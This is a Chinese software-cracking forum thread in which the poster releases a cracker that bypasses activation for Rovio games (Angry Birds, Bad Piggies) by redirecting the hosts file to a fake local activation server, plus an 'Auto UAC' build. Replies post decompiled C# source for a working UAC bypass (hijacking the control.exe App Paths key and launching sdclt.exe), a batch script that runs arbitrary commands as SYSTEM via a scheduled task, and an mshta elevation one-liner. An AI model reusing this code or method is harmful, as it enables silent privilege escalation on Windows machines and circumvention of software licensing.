【自动绕过UAC】Rovio Entertainment 通用破解器 (破解愤怒的小鸟、捣蛋猪什么的)

JemmyloveJenny · 发表于 2017-7-13 10:39

本帖最后由 JemmyloveJenny 于 2017-7-13 11:15 编辑

如果哪位童鞋是被【自动绕过UAC】吸引进来的，直接看帖子的最后部分的红字那里吧
如果哪位童鞋是被【自动绕过UAC】吸引进来的，直接看帖子的最后部分的红字那里吧
如果哪位童鞋是被【自动绕过UAC】吸引进来的，直接看帖子的最后部分的红字那里吧

大家应该都还记得愤怒的小鸟(Angry Birds)、捣蛋猪(Bad Piggies) 这些经典的游戏吧？
这些游戏都是由 Rovio Entertainment 公司出品的。我的软件就是破解这个公司软件的通用破解器

我知道，这些游戏早就过时了，现在发出来也没有什么意义了。
反正就是前几天，我突然想重温一下这些游戏，就去了 Rovio Entertainment 的官网下载了它的原版，结果突然发现它需要注册！！！！
我对软件都有洁癖，不想到网上下载破解版的（因为破解版都没有数字签名），所以就想着自己把这个程序破解一下。
Rovio Entertainment 的游戏注册方法都差不多，具体方法我在破解器的帮助里写了，我现在把程序帮助贴出来：

---------------------------------------我是分割线---------------------------------------
（居然回车全没了…………………………你们凑合看吧）
Rovio Entertainment 通用破解器 V1.0作者：JemmyLoveJenny 声明：本软件仅做学习交流，不可用于商业用途。否则由此造成的法律责任及问题，由使用者个人自行承担，与软件作者无关。如果你不同意本声明，请勿使用本软件的任何功能。破解步骤：1.修改Hosts文件。2.刷新DNS。3.启动激活服务。4.打开要激活的游戏程序，用任意注册码注册（可以连续注册多个游戏）。5.激活成功后，停止激活服务。6.还原Hosts。7.刷新DNS。（如果对破解步骤有疑问，请看破解原理）破解原理：Rovio Entertainment 公司的游戏都是通过联网验证获得完整版。若果密钥无效，激活服务器会返回”status=0&msg=Invalid Key”；密钥有效返回”status=1”。本程序就模拟了Rovio的激活服务器返回密钥有效的结果。修改Hosts是为了将Rovio服务器重定向到localhost；刷新DNS是为了清除本机DNS缓存；激活服务就是模拟Rovio服务器的核心内容。
---------------------------------------我是分割线---------------------------------------
行了，废话不多说了，开始介绍程序：
运行时.png

打开程序后默认的界面就是这样的，功能分为自动破解和手动破解，实际功能没差别，不过手动的更加麻烦。
自动破解.png

我开了个虚拟机，安装 Bad Piggies 给一个激活成功的截图
破解成功.png

我这次用的是自动破解，手动破解你们就自己尝试吧……
最后，补充说明：程序使用C#语言编写，使用时可能要求安装 .Net Framework 4，
而.Net程序可以直接被反编译看到源码，我给发布的程序加了Safengine的壳本破解器会要求以管理员权限运行，
因为破解过程需要修改hosts，而且在一些电脑上，启动服务那一步也需要管理员权限才能正常完成。
我说过，我对软件有洁癖，不过我是搞不来数字签名了，但我觉得没有数字签名的程序请求UAC有点看不顺眼，
所以，我又做了一个特别版本：Auto UAC版，理论上，如果登录用户是管理员，UAC是默认设置时应该能绕过UAC弹窗，直接以管理员身份运行。
为了验证Auto UAC版本确实可以工作，可以点击开始手动破解-修改hosts文件，然后自己手动查看hosts文件是不是被改动了
有兴趣的同学可以分析一下我的Auto UAC版是怎么做到的。
如果有人想要了解AutoUAC版工作原理，就回帖告诉我吧！
最后发布下载地址了！！
土豪下载Standard版：

Rovio-Entertainment-Cracker_se.zip (729.3 KB, 下载次数: 55)
土豪下载AutoUAC版：

Rovio-Entertainment-Cracker (Auto UAC)_se.zip (735.32 KB, 下载次数: 77)
百度云盘（双版本）：http://pan.baidu.com/s/1c2lH2NI
如果有哪一个Rovio的游戏无法用这个破解器破解掉，你们一定要反馈给我啊！！

2217936322 · 发表于 2017-7-13 11:13

本帖最后由 2217936322 于 2017-7-13 11:31 编辑

一楼预留下班我帮你把源码贴出来

using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Security.Principal;
using System.Threading;
using Microsoft.Win32;

namespace Rovio_Entertainment_Cracker
{
// Token: 0x02000005 RID: 5
internal class UAC
{
      // Token: 0x0600001E RID: 30
      [DllImport("Kernel32.dll", CharSet = CharSet.Auto, SetLastError = true
      private static extern bool Wow64DisableWow64FsRedirection(ref IntPtr ptr);

      // Token: 0x0600001F RID: 31
      [DllImport("Kernel32.dll", CharSet = CharSet.Auto, SetLastError = true
      private static extern bool Wow64RevertWow64FsRedirection(IntPtr ptr);

      // Token: 0x06000020 RID: 32
      [DllImport("shell32.dll"
      private static extern IntPtr ShellExecute(IntPtr hwnd, string lpOperation, string lpFile, string lpParameters, string lpDirectory, int nShowCmd);

      // Token: 0x06000021 RID: 33 RVA: 0x0000368F File Offset: 0x0000368F
      public static bool RunInAdministrator()
      {
         return new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator);
      }

      // Token: 0x06000022 RID: 34 RVA: 0x000036A8 File Offset: 0x000036A8
      public static void GetAdministrator()
      {
         IntPtr ptr = 0;
         UAC.ModifyReg();
         UAC.Wow64DisableWow64FsRedirection(ref ptr);
         UAC.RunProgram("C:\\Windows\\System32\\sdclt.exe", 1);
         Thread.Sleep(200);
         UAC.Wow64RevertWow64FsRedirection(ptr);
         UAC.RestoreReg();
      }

      // Token: 0x06000023 RID: 35 RVA: 0x000036EC File Offset: 0x000036EC
      private static void RunProgram(string path, int mode)
      {
         IntPtr ptr = 0;
         UAC.Wow64DisableWow64FsRedirection(ref ptr);
         UAC.ShellExecute(IntPtr.Zero, "runas", path, "", "", mode);
         UAC.Wow64RevertWow64FsRedirection(ptr);
      }

      // Token: 0x06000024 RID: 36 RVA: 0x0000372C File Offset: 0x0000372C
      private static void ModifyReg()
      {
         Registry.CurrentUser.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\APP Paths\\control.exe").SetValue("", Process.GetCurrentProcess().MainModule.FileName);
      }

      // Token: 0x06000025 RID: 37 RVA: 0x00003756 File Offset: 0x00003756
      private static void RestoreReg()
      {
         Registry.CurrentUser.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\APP Paths\\control.exe").SetValue("", "");
      }
}
}

myweb1996 · 发表于 2017-7-13 12:00

CVE2017-0213 管理员权限提升至system权限

[Shell] 纯文本查看 复制代码

@echo off
ver|findstr "5\.[0-9]\.[0-9][0-9]*" >NUL 2>NUL && (echo [-] Not Working for winxp\win2k3 &&goto :EOF)
del /f /q %result_file% >NUL 2>NUL
Rd "%WinDir%\system32\test_permissions" >NUL 2>NUL
Md "%WinDir%\System32\test_permissions" 2>NUL||(Echo.& [-] Echo Run as administrator user. &&goto :EOF)

set comands=%*
if not defined comands (
    echo.
    echo Run as SYSTEM  Account Tool
    echo.
    echo [-] error: The syntax of the command is incorrect.
    echo.
    echo Usage:
    echo       %~n0 command 
    goto :EOF
    )

set result_file=%tmp%\command_result.txt

schtasks.exe /create /ru "SYSTEM" /tn "runAsSystem" /sc DAILY /tr "cmd.exe /c chcp 437>NUL 2>NUL&&%comands%>> %result_file%" /F >NUL 2>NUL
schtasks.exe /run   /tn runAsSystem /i >NUL 2>NUL
chcp 437>NUL 2>NUL&& schtasks.exe /query /tn runAsSystem /fo list| findstr /i "Running"  >NUL 2>NUL && (goto :Running ) || ( goto :Ready)

:Ready
type %result_file%
schtasks.exe  /delete /tn runAsSystem /f >NUL 2>NUL
del /f /q %result_file% >NUL 2>NUL
goto :EOF

:Running
TIMEOUT /T 1 >NUL 2>NUL
chcp 437>NUL 2>NUL&& schtasks.exe /query /tn runAsSystem /fo list| findstr /i "Running"  >NUL 2>NUL && (goto :Running ) || ( goto :Ready)
goto :EOF

:EOF

JemmyloveJenny · 发表于 2017-7-13 11:14

2217936322 发表于 2017-7-13 11:13
一楼预留下班我帮你把源码贴出来

你要反编译出源码？？？
大神啊！

myweb1996 · 发表于 2017-7-13 11:57

cls
%1 %2
ver|find " 5.">nul &&goto :st
echo 正在进行 UAC 提权...
mshta vbscript:createobject("shell.application").shellexecute("%~s0","goto :st","","runas",1)(window.close)&goto :eof
:st
cmd.exe

JemmyloveJenny · 发表于 2017-7-13 14:32

2217936322 发表于 2017-7-13 11:13
一楼预留下班我帮你把源码贴出来

Safengine的壳怎么能脱掉？！牛人啊！

夏宇 · 发表于 2017-7-13 17:22

感谢分享！！！！！

dxpzaixian · 发表于 2017-7-13 17:31

提示: 作者被禁止或删除内容自动屏蔽

wdllp123 · 发表于 2017-7-16 15:54

玩玩小游戏还是不错的

雪月花 · 发表于 2017-7-16 21:11

Rovio的游戏PC版都找不到了吧官网是没有PC版下载入口的

帐号		自动登录	找回密码
密码			注册[Register]

[原创工具] 【自动绕过UAC】Rovio Entertainment 通用破解器 (破解愤怒的小鸟、捣蛋猪什么的)

免费评分

dxpzaixian dxpzaixian 当前离线好友阅读权限 0 听众最后登录 1970-1-1 头像被屏蔽	dxpzaixian 发表于 2017-7-13 17:31 来自手机提示: 作者被禁止或删除内容自动屏蔽

	回复支持举报